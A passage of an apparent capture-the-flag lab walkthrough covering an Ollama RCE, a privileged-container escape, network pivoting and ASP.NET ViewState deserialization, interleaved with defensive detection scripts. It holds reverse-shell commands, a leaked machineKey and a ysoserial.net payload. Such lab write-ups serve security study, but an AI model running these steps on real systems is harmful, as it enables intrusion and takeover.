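        "benign": urlencode({"language": "en", "setting": "Generic H2 (Embedded)",
                             "url": "jdbc:h2:~/test", "user": "sa", "password": ""}),
        "logger_write": urlencode({"language": "en", "setting": "Generic PostgreSQL",
                                   "url": pg_write, "user": "sa", "password": "sa"}),
        "classpath_load": urlencode({"language": "en", "setting": "Generic PostgreSQL",
                                     "url": pg_load}),
    }


if __name__ == "__main__":
    for label, body in sample_bodies().items():
        print(label, inspect_h2_login(body) or "clean")
```

The configuration fix is spring.h2.console.enabled=false in the Spring Boot properties, which removes both the unauthenticated console and the driver-switching surface it exposes.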
The first scan here only found port 22 open, but a full-port scan reveals port 11434 is also open, the default listening port of the Ollama LLM service.
root@web01:/root# ./FScan_2.0.1_linux_x64 -h 172.22.10.17 -p 1-65535
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.8s] 已选择服务扫描模式
[1.8s] 开始信息扫描
[1.8s] 最终有效主机数量: 1
[1.8s] 开始主机扫描
[1.8s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s] 有效端口数量: 65535
[1.9s] [*] 端口开放 172.22.10.17:22
[2.2s] [*] 端口开放 172.22.10.17:11434
[3.7s] 扫描完成, 发现 2 个开放端口
[3.7s] 存活端口数量: 2
[3.7s] 开始漏洞扫描
Visiting it also shows that Ollama is running.
Requesting /api/version returns the Ollama version, 0.1.46.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q curl http://172.22.10.17:11434/api/version
{"version":"0.1.46"}
A web search shows that this version has an RCE vulnerability, and again a ready-made tool can be used directly.
GitHub - badboy0/Ollama_Exploit_Tool
Start the listener first, then get a shell with the tool.
nc -lvnp 9999 # run on web01
root@web01:/root# ./Ollama_Exploit_Tool
/$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$$$$$
/$$__ $$| $$ | $$ /$$__ $$| $$$ /$$$ /$$__ $$
| $$ \ $$| $$ | $$ | $$ \ $$| $$$$ /$$$$| $$ \ $$
| $$ | $$| $$ | $$ | $$$$$$$$| $$ $$/$$ $$| $$$$$$$$
| $$ | $$| $$ | $$ | $$__ $$| $$ $$$| $$| $$__ $$
| $$ | $$| $$ | $$ | $$ | $$| $$\ $ | $$| $$ | $$
| $$$$$$/| $$$$$$$$| $$$$$$$$| $$ | $$| $$ \/ | $$| $$ | $$
\______/ |________/|________/|__/ |__/|__/ |__/|__/ |__/
OLLAMA EXPLOIT ————坏孩子
CVE-2024-37032 Exploit - Ollama AFR/RCE
CVE-2024-37032 & CVE-2024-45436 Exploit - Ollama RCE
EXPLOIT OPTIONS
1. Remote Code Execution (RCE)
2. Arbitrary File Read
3. Check Vulnerability
4. Exit
Select an option (0-3): 1
Enter target URL (e.g., http://localhost:11434): http://172.22.10.17:11434
Enter command to execute (e.g., 'bash -i >& /dev/tcp/IP/PORT 0>&1'): bash -i >& /dev/tcp/172.22.10.22/9999 0>&1
[*] Starting RCE exploit (CVE-2024-37032 & CVE-2024-45436)
[*] Compiling malicious shared library...
[+] Successfully compiled hook.so
[*] Creating malicious zip archive with path traversal...
[+] Successfully created evil.zip
[*] Uploading malicious blob evil.zip...
[*] Upload blob response:
[*] Creating malicious model...
[*] Create model response: {"status":"unpacking model metadata"}
{"error":"couldn't determine model format"}
[*] Triggering exploit via embeddings API...
[!] Pulling model, please wait...
[*] Pulling all-minilm:22m model...
Here, check the Capabilities bits of the current container: it turns out to be a privileged container.
root@8c1b974b20d0:/# cat /proc/self/status | grep Cap
cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
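Decoding the Cap* masks shown above is something an auditor or a container-security check can script instead of eyeballing. The following is an added example (not from the write-up): it parses the status text, expands the effective mask into capability names, and compares the result with the set Docker grants to an ordinary container. The mask values are the ones captured above, the bit-to-name table follows the linux/capability.h bit order, and the "looks privileged" heuristic (every capability up to CAP_AUDIT_READ present in the effective set) is my own assumption about what a full bounding set looks like.

```python
"""Decode Cap* masks from /proc/<pid>/status and flag sets beyond a runtime's default.

Added example, not from the write-up. SAMPLE_STATUS copies the masks captured inside
the container above; CAP_NAMES follows linux/capability.h bit order and
DOCKER_DEFAULT_CAPS is the set Docker grants without --privileged or --cap-add.
"""
import re

# index == bit position in the Cap* masks
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]

DOCKER_DEFAULT_CAPS = frozenset({
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD",
    "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP",
    "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE",
})

# Capabilities that on their own let a process reach the host (mount devices, load
# modules, raw I/O, ptrace): any of these in the effective set is a finding.
HOST_REACH_CAPS = frozenset({"CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_PTRACE"})

# Output captured in the container above (copied from the write-up, not constructed).
SAMPLE_STATUS = """\
CapInh: 0000000000000000
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
"""


def parse_cap_masks(status_text):
    """Return {'CapInh': int, 'CapPrm': int, ...} from the text of /proc/<pid>/status."""
    masks = {}
    for m in re.finditer(r"^(Cap\w+):\s*([0-9a-fA-F]+)\s*$", status_text, re.M):
        masks[m.group(1)] = int(m.group(2), 16)
    return masks


def decode_caps(mask):
    """Expand a capability bitmask into names; bits newer than the table become CAP_<n>."""
    names = []
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_{bit}")
        bit += 1
    return names


def assess_container(status_text):
    """Summarize the effective set: what exceeds the Docker default, whether a
    host-reaching capability is present, and whether it looks like --privileged
    (heuristic, my assumption: all capabilities up to CAP_AUDIT_READ are present)."""
    masks = parse_cap_masks(status_text)
    effective = set(decode_caps(masks.get("CapEff", 0)))
    return {
        "effective_count": len(effective),
        "beyond_docker_default": sorted(effective - DOCKER_DEFAULT_CAPS),
        "host_reach_possible": bool(effective & HOST_REACH_CAPS),
        "looks_privileged": set(CAP_NAMES[:38]).issubset(effective),
    }


if __name__ == "__main__":
    import sys
    text = SAMPLE_STATUS
    if len(sys.argv) > 1:  # pass a path such as /proc/self/status to check a live process
        with open(sys.argv[1]) as fh:
            text = fh.read()
    for key, value in assess_container(text).items():
        print(f"{key}: {value}")
```

Run with no arguments it evaluates the captured masks; pass /proc/self/status to check the process you are in. The same comparison against DOCKER_DEFAULT_CAPS is what an admission policy should enforce before a workload like Ollama is allowed to run: CAP_SYS_ADMIN in the effective set is what makes the mount-based escape below possible.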
A privileged container is easy to escape from: mount the host's disk directly.
Related tutorial: Privileged-mode container escape | T Wiki
root@8c1b974b20d0:/# mkdir -p /mnt/host
root@8c1b974b20d0:/# mount /dev/vda3 /mnt/host
root@8c1b974b20d0:/mnt/host# chroot /mnt/host
# passwd  # set a new root password directly
Then you can SSH into this machine with the password you set (an internal-network proxy is needed).
Looking at the network interfaces, the machine also has an interface on the 20 subnet.
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:10:25:bf brd ff:ff:ff:ff:ff:ff
inet 172.22.10.17/24 metric 100 brd 172.22.10.255 scope global dynamic eth0
valid_lft 1892154743sec preferred_lft 1892154743sec
inet6 fe80::216:3eff:fe10:25bf/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:54:d2:8f:c2 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:54ff:fed2:8fc2/64 scope link
valid_lft forever preferred_lft forever
5: vethd8b41cb@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 72:16:f3:ff:62:21 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::7016:f3ff:feff:6221/64 scope link
valid_lft forever preferred_lft forever
6: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:10:25:e7 brd ff:ff:ff:ff:ff:ff
inet 172.22.20.11/24 metric 100 brd 172.22.20.255 scope global dynamic eth1
valid_lft 1892154849sec preferred_lft 1892154849sec
inet6 fe80::216:3eff:fe10:25e7/64 scope link
valid_lft forever preferred_lft forever
Upload the Stowaway agent and set up a two-hop proxy.
First, run the following on your VPS:
(node 0) >> listen
[*] BE AWARE! If you choose IPTables Reuse or SOReuse,you MUST CONFIRM that the node you're controlling was started in the corresponding way!
[*] When you choose IPTables Reuse or SOReuse, the node will use the initial config(when node started) to reuse port!
[*] Please choose the mode(1.Normal passive/2.IPTables Reuse/3.SOReuse): 1
[*] Please input the [ip:]<port> : 9898
[*] Waiting for response......
[*] Node is listening on 9898
(node 0) >>
Then run the following command on Ollama to connect:
root@Ollama:~# ./linux_x64_agent -c 172.22.10.22:9898
2025/11/08 21:43:47 [*] Starting agent node actively.Connecting to 172.22.10.22:9998
Once connected, go back to your admin side (on the VPS) and do the following:
[*] Node is listening on 9898
(node 0) >>
[*] New node online! Node id is 1
(node 0) >> back
(admin) >> use 1
(node 1) >> socks 7777
[*] Trying to listen on 0.0.0.0:7777......
[*] Waiting for agent's response......
[*] Socks start successfully!
Your two-hop proxy is now set up; change the proxy port in your earlier proxychains and Proxifier configuration to the new port, and you can reach both the 10 and the 20 subnets of the internal network.
Upload fscan to the Ollama machine and scan the 20 subnet.
root@Ollama:~# ./FScan_2.0.1_linux_x64 -h 172.22.20.11/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.9s] 已选择服务扫描模式
[1.9s] 开始信息扫描
[1.9s] CIDR范围: 172.22.20.0-172.22.20.255
[1.9s] generate_ip_range_full
[1.9s] 解析CIDR 172.22.20.11/24 -> IP范围 172.22.20.0-172.22.20.255
[1.9s] 最终有效主机数量: 256
[1.9s] 开始主机扫描
[1.9s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.20.11 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.165 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.25 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.253 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.32 存活 (ICMP)
[1.9s] [*] 目标 172.22.20.38 存活 (ICMP)
[4.9s] 存活主机数量: 6
[4.9s] 有效端口数量: 233
[5.0s] [*] 端口开放 172.22.20.25:88
[5.0s] [*] 端口开放 172.22.20.25:139
[5.0s] [*] 端口开放 172.22.20.25:135
[5.0s] [*] 端口开放 172.22.20.11:22
[5.0s] [*] 端口开放 172.22.20.25:445
[5.0s] [*] 端口开放 172.22.20.25:389
[5.0s] [*] 端口开放 172.22.20.165:139
[5.0s] [*] 端口开放 172.22.20.165:445
[5.0s] [*] 端口开放 172.22.20.165:135
[5.0s] [*] 端口开放 172.22.20.32:445
[5.0s] [*] 端口开放 172.22.20.32:139
[5.0s] [*] 端口开放 172.22.20.32:135
[5.0s] [*] 端口开放 172.22.20.38:445
[5.0s] [*] 端口开放 172.22.20.38:139
[5.0s] [*] 端口开放 172.22.20.38:135
[5.0s] [*] 端口开放 172.22.20.38:80
[5.0s] [*] 端口开放 172.22.20.38:21
[5.0s] [*] 端口开放 172.22.20.38:8172
[5.0s] [*] 端口开放 172.22.20.38:8080
[8.0s] 扫描完成, 发现 19 个开放端口
[8.0s] 存活端口数量: 19
[8.0s] 开始漏洞扫描
[8.0s] [*] 网站标题 http://172.22.20.38 状态码:404 长度:315 标题:Not Found
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.20.165
主机名: FPSRVIIS03-2
发现的网络接口:
IPv4地址:
└─ 172.22.20.165
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.20.25
主机名: FPSRVAD01
发现的网络接口:
IPv4地址:
└─ 172.22.20.25
[8.1s] [*] NetInfo 扫描结果
目标主机: 172.22.20.32
主机名: FPSRVFS02
发现的网络接口:
IPv4地址:
└─ 172.22.20.32
[8.1s] [*] NetInfo 扫描结果
目标主机: 172.22.20.38
主机名: FPSRVIIS03
发现的网络接口:
IPv4地址:
└─ 172.22.20.38
[8.1s] [+] NetBios 172.22.20.38 FPCORP\FPSRVIIS03
[8.1s] [+] NetBios 172.22.20.32 FPCORP\FPSRVFS02
[8.1s] [+] NetBios 172.22.20.25 DC:FPCORP\FPSRVAD01
[8.1s] [+] NetBios 172.22.20.165 FPCORP\FPSRVIIS03-2
[8.1s] POC加载完成: 总共387个,成功387个,失败0个
[8.2s] [+] FTP服务 172.22.20.38:21 匿名登录成功!
[8.7s] [+] SSH密码认证成功 172.22.20.11:22 User:root Pass:123123
[9.7s] [*] 网站标题 http://172.22.20.38:8080 状态码:200 长度:5078 标题:IntraFetch
[10.1s] [*] 网站标题 https://172.22.20.38:8172 状态码:404 长度:0 标题:无标题
[52.4s] 扫描已完成: 35/35
Summary:
FPSRVAD01: 172.22.20.25 domain controller
FPITWKS101: 172.22.20.165
FPSRVFS02: 172.22.20.32
FPSRVIIS03: 172.22.20.38 anonymous FTP login, IIS server
Ollama: 172.22.20.11 already compromised
Obviously the next target is 172.22.20.38.
First configure /etc/hosts and /etc/krb5.conf.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance/ftp]
└─# proxychains -q nxc smb 172.22.20.25 -u guest -p '' --generate-hosts-file hosts
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance/ftp]
└─# cat hosts
172.22.20.25 FPSRVAD01.fpcorp.int fpcorp.int FPSRVAD01
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# cat hosts >> /etc/hosts
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u guest -p '' --generate-krb5-file /etc/krb5.conf
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [+] krb5 conf saved to: /etc/krb5.conf
SMB 172.22.20.25 445 FPSRVAD01 [+] Run the following command to use the conf file: export KRB5_CONFIG=/etc/krb5.conf
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# cat /etc/krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = FPCORP.INT
[realms]
FPCORP.INT = {
kdc = fpsrvad01.fpcorp.int
admin_server = fpsrvad01.fpcorp.int
default_domain = fpcorp.int
}
[domain_realm]
.fpcorp.int = FPCORP.INT
fpcorp.int = FPCORP.INT
This is an internal software resource center site called IntraFetch.
It offers some file downloads.
It runs on IIS with the ASP.NET framework.
Log in to the target FTP server anonymously as the anonymous user.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q ftp 172.22.20.38
Connected to 172.22.20.38.
220 Microsoft FTP Service
Name (172.22.20.38:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> ls
229 Entering Extended Passive Mode (|||49771|)
125 Data connection already open; Transfer starting.
07-04-25 09:58AM <DIR> WebDeploy
226 Transfer complete.
ftp> cd WebDeploy
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49773|)
125 Data connection already open; Transfer starting.
07-04-25 09:58AM <DIR> IntraFetch
226 Transfer complete.
ftp> cd IntraFetch
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49775|)
125 Data connection already open; Transfer starting.
07-04-25 09:58AM 3498 package.deploy-readme.txt
07-04-25 09:58AM 14441 package.deploy.cmd
07-04-25 09:58AM 446 package.SetParameters.xml
07-04-25 09:58AM 543 package.SourceManifest.xml
07-04-25 09:58AM 12105992 package.zip
226 Transfer complete.
ftp> get package.zip
local: package.zip remote: package.zip
229 Entering Extended Passive Mode (|||49781|)
125 Data connection already open; Transfer starting.
100% |******************************************************| 11822 KiB 689.97 KiB/s 00:00 ETA
226 Transfer complete.
12105992 bytes received in 00:17 (689.52 KiB/s)
ftp> exit
221 Goodbye.
Under WebDeploy\IntraFetch there is a package.zip, which is the site's source code.
For an ASP.NET application the most important thing to look at is Web.config; it holds a lot of configuration.
At line 62 of Web.config there is a plaintext machineKey configuration:
<machineKey decryption="AES"
decryptionKey="6424A8B2C8CE51FEFECBDBE795A8F33EBD81234CB655F610EEC49CFA13F89CC1"
validation="SHA1"
validationKey="1B7E26950A9C9ABFE4FE72FF25649D4DC4CA6286F3943D3ABB1B70AC6D81142D000CC3880E137C49954EF6284980381A2C674F785C13C960BDE13CB2595873FD"/>
Note: machineKey is used to encrypt/decrypt and validate sensitive data such as ViewState, Forms Authentication tickets and session state. If this key leaks, an attacker may be able to forge or tamper with that data.
The application uses the ASP.NET Web Forms ViewState mechanism. ViewState is sent to the client in the hidden field __VIEWSTATE and deserialized on POST back. With the machineKey known, an attacker can:
Protections in Site.master
Site.master.cs implements several layers of protection:
Once Page.ViewStateUserKey is set, ASP.NET mixes that value into the ViewState MAC (message authentication code). Even with the machineKey, we cannot obtain that user's specific cookie, so we still cannot forge a valid ViewState.
There is also an additional Anti-XSRF token check.
After the ViewState has been deserialized (Page_PreLoad), the Anti-XSRF token and user name inside it are checked.
If that check fails, a forged ViewState is rejected even if it passed the MAC check; this is really a post-deserialization integrity check on the data.
The vast majority of the .aspx pages here include this Site.master master page,
but one slipped through the net: Download.aspx.
Its code does not set MasterPageFile, so it does not include Site.master, and the protective code in Site.master.cs never runs for it.
This Download.aspx is our deserialization entry point.
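The reason Download.aspx is exposed while the Site.master pages are not comes down to what the ViewState MAC is bound to. The following is an added toy model (not code from the write-up or from IntraFetch) of that binding: the MAC covers the serialized data plus a "modifier" made of the page path and, when the page sets one, ViewStateUserKey. The real ASP.NET pipeline derives keys differently (purpose-based SP800-108 derivation since 4.5) and adds further modifiers, so this is not bit-compatible with real __VIEWSTATE values; the validation key and session id used here are constructed, not the Web.config ones.

```python
"""Toy model of the ViewState MAC and the effect of Page.ViewStateUserKey.

Added illustration, not code from the write-up or from IntraFetch. It keeps only the
part that matters for the Site.master discussion: HMAC over data || modifier, where
the modifier is the page path plus the per-user key when the page set one.
The key and session id below are constructed, not the ones from Web.config.
"""
import hashlib
import hmac

# Constructed 64-byte key standing in for validationKey (validation="SHA1").
VALIDATION_KEY = bytes.fromhex("0123456789abcdef" * 8)
MAC_LEN = hashlib.sha1().digest_size  # 20 bytes


def _modifier(page_path, view_state_user_key):
    """Extra data the MAC is bound to: the page path, plus ViewStateUserKey if set."""
    mod = page_path.lower().encode()
    if view_state_user_key:
        mod += b"|" + view_state_user_key.encode()
    return mod


def sign_viewstate(data, key, page_path, view_state_user_key=None):
    """Server side when rendering: append HMAC-SHA1(key, data || modifier)."""
    mac = hmac.new(key, data + _modifier(page_path, view_state_user_key), hashlib.sha1).digest()
    return data + mac


def verify_viewstate(blob, key, page_path, view_state_user_key=None):
    """Server side on POST back: recompute the MAC with this page's modifier and compare."""
    if len(blob) <= MAC_LEN:
        return False
    data, mac = blob[:-MAC_LEN], blob[-MAC_LEN:]
    expected = hmac.new(key, data + _modifier(page_path, view_state_user_key), hashlib.sha1).digest()
    return hmac.compare_digest(mac, expected)


def leaked_key_forgery_accepted(server_user_key):
    """Verdict on a blob signed with only the leaked key and the page path.

    The forger knows the key and the path but not the victim's session-bound
    ViewStateUserKey, so the blob is signed with none; the server verifies with
    whatever ViewStateUserKey the page actually set (None for Download.aspx).
    """
    blob = sign_viewstate(b"<serialized object chosen by the forger>", VALIDATION_KEY, "/Download.aspx")
    return verify_viewstate(blob, VALIDATION_KEY, "/Download.aspx", server_user_key)


if __name__ == "__main__":
    # Download.aspx: no master page, so no ViewStateUserKey -> the leaked key is enough.
    print("no ViewStateUserKey:", leaked_key_forgery_accepted(None))  # True
    # Pages under Site.master: ViewStateUserKey set per session -> the forged MAC fails.
    print("ViewStateUserKey set:", leaked_key_forgery_accepted("constructed-session-id"))  # False
```

The model makes the remediation concrete: ViewStateUserKey must be set on every page that accepts a POST back, which is easier to guarantee from a common base Page class or a global pre-init hook than from a master page that individual pages can omit. Rotating the leaked machineKey is still required; the per-user key only limits what a leak is worth.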
Use ysoserial.net to generate a reverse-shell payload.
GitHub - pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
First create a PowerShell base64 payload with a reverse shell generator.
Then generate the deserialization payload; note that the --path parameter must be set to the unprotected /Download.aspx.
PS D:\tools\ysoserial_net> ./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e 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" --path="/Download.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="6424A8B2C8CE51FEFECBDBE795A8F33EBD81234CB655F610EEC49CFA13F89CC1" --validationalg="SHA1" --validationkey="1B7E26950A9C9ABFE4FE72FF25649D4DC4CA6286F3943D3ABB1B70AC6D81142D000CC3880E137C49954EF6284980381A2C674F785C13C960BDE13CB2595873FD"
HN4qiIWy4C2hO9AieD3JBv0w5vlgyIah8lb1eGbNQQMT%2FWRxgusmkIx9GlCXWm7q9gIUhVafMLZlncfJMAA49C1PGa1pXuNgCJvSDKqs62BYDN7dG987veFnWMVOcpNfk9ehTGZu1thELVaTlyoYan58Vh5OrYx0K50VkJ9ivtZrxQ2%2Bo9fPSk%2Bgoq8ExcsGPjOdbsaW2VpDjh%2BGLN%2FU6Pth4g2GeQmFzbvOrHG9i3Hl2hc8laOHoX44%2FUWAKrlsOz6JuN1Ib9Heg2HKHxx%2F9RGElCeLZNZqF6dpRlgnqJ%2FVRB6N5vGRA7UGXcznMADpdWyma5dRRE7HQXjhXuuFA2nsDvo6zgYjXhNO9PJj2f4mHnTK6AQ%2FF0YhqwjxtJ1FqDpZpBsjRQ69QDKP9WLY28Gnv3Uo6KJlxehqPsLNHWdCqDlB1VhHqwaIJ8mzbZgfXshoyVBwlHBF6WCxfAmVQn72EzVuWDOSqhdpTxbHqe%2F6sGkzrJdUXqfLGwDJ90LfwhtztPyVNAb9giJykE65bZjn4NhLkZgXgLRNFAnkeuG7ljgBwO%2FWEnrViK61w4vl%2FWnS3bSPRVacoSCp1bHkHDxslw3o3wIQM7j9CFlX%2Fb20RZG5RvLFAomzTZrsOLL9k56o20fLJlUpL3L5P6NaPXMzLmN9HGHOkiU%2B59uzY0JkQpmOt76vFSe2IdehwMQF3MKSAjU6mIIlWmzNU3P%2Fy3TnBIoblRe7uOde62T3gfTaKsYcK2zay9kmLF1r1HdaqgVyT2HiX%2FsCy4uWSQxhg348lfYPWJxAbdhJMX%2F0rLzAyYgezgRs4DT7Mt%2FNjgP0FzaX9roVsssgtloyWmBnloM%2B1WhmDzwMyaxw%2BULZNK5t5YXGD1jwlKQlG5p2kK%2Fto7D6FB91r6IyjmaMZckoFhJGXFzM8%2BhVJq%2Fa9YxOyhpzrSItInfr0RFiQh8E4GoQa5biLi%2FnOMdB5cC5u20ADZIFdb8rf4dff5V89aswMmQLYZrnaWu9uKmDf05YVmGrTvfWLqSM8SVrGjKhvaP0tTO0B1Tfij%2Bhlkoogphf03yZykHMgOxXX9exYB8pX5Rqkhiri%2B%2FJMBuAGnaukXOa7k8tXdEudrcCY66LYiSb23Lx4J8ACZJ3ZxfVkRCtZedE%2Bby4eHHjmnGs7VZviaXxXaw8VmaUL7ygB%2FCc1i8whvgMc33wCtmGxx6bebEWnZjDi8bVWovHamhRnuDXqcAeGGqxSguwleZBTvtwgBs8EaZqHlJ0jpPCHoVXHQh3iycRqKE91SbptHuQZXCsWOnz6Zsm8dMSeksVSu9tThgaApP8X%2FY7B%2FkEQNVDylho%2F5VDtKYhOo%2FIpCrARU3EiPebFvU6kk97iHquWee7Aof99fCMs3YsMn8queVwweLuVoHNLmpGTOZFmpBNvvmjmQUp5t0q%2Fbf5Er3DKRFJwBGy3BluLo0AIPI7L8o%2FzFor1M3m%2BBXkW00QbxtsOGB3BFj4yDHgjxk6GuP%2BqVDpW2pXFvgUis2YHWZPN169XsA5NzlfcvekgzmnJSi5iyoc6G0MyqkpWSJGAS%2Fzot7cY5Bhe7biKgKh57lnnA%2FMh9%2B84d2f1STZdOCOGeOzG16E3DbQlNuxIpy8cFhs5O2M0u%2BlxuBTVvPiWg5OhgyyADHNwuBjXhaFDEFMXYw6%2FOlVaeM2tzunNaz9ynFwkG3D0n42H9cDED4BFPQeEF6hdVWnTiRI1AG5jCX1IiYW9gBYHe67e5mRlimUxLarKQEUutuBGTmpT1f1H2BbGd6HqB4pFMcCJMqFYwIWBFTpHuTSOi0TXNWdxu9xre61%2B2ZB6SRI1fD876YSQuEunM2Vn6v2VvuifAbEf2JApQzVMIz78em13aHEpZPJtNKPiqu8XSocNxxJQbquutz8iCZA%2
FQQqhgKul0xwmH6e26f8cno1i%2F75vzB%2FqxOQpD%2FSoc4hTZx7LM7%2FMIag%2B7Lf6DJ8R%2FnKyslPKjWped4US%2By2jwzx8YzyccXzoqOh0XNNizhHChgp9Go5OV%2FSB6AML%2FU%2Bn0I1JZaaW%2FUD7LPG%2BYi45MCOCPiFUSLrpKSQxUMY%2Fy8092r2OcLlyRa%2BCA0r5PkYEqJvOFafs2bhCbcBD9%2FftmPkXP1%2Fwu5hviqN%2Favs0QNe4%2F1FEcqEW85xc4%2BcNiYMLx5SbYGytz7QMj%2FHPYqvuIbaob06YiTmt1NaoCJlL0vjh0souyAuh3lo5HJZJGbK9j%2FLMCIrsEKElUX5lT7SJdpEvBnzghrSyz019AtbVbqR3CPFIQI0qNKrqoepYW0q99joVw%2Bl6fOuXjPqoTy4vyU0FbpQokfFAaZD6evBd4i84hiLLAsaybz5oNg2Wc8DV6vZdiMnTh3kvvHdl3Y9emtVdLXrwv%2Bzw87IIX%2Fhpr8CF0ChvYwhVcFy13VhNu8xZ0VYst18z%2BvKPqevBTpuhMGl6MlFC6rqmFpA7O5pmiVk0wT1Th6iDcB2reFIr9bFF9jSKne9MFOXXvWhpW1RzXvcWr%2FR4vwJOrAj7H3LaF1xQkMACDpZi9KfG4iDmNpnWU4QYqY8itNF3bXtLFjtqMIRjQY7FOwgYanzbIwnTBjSfF%2BbUp2%2BgE63UhcXlE%2B71LJxNKKn31cSGCGxz2pt4vOwtmUHWrHMmWv6pqI%2BfdRAa5wniBeBSEUFxUrqoUVVOA8X3QAphtvhdAwn733lmaFi%2Fcq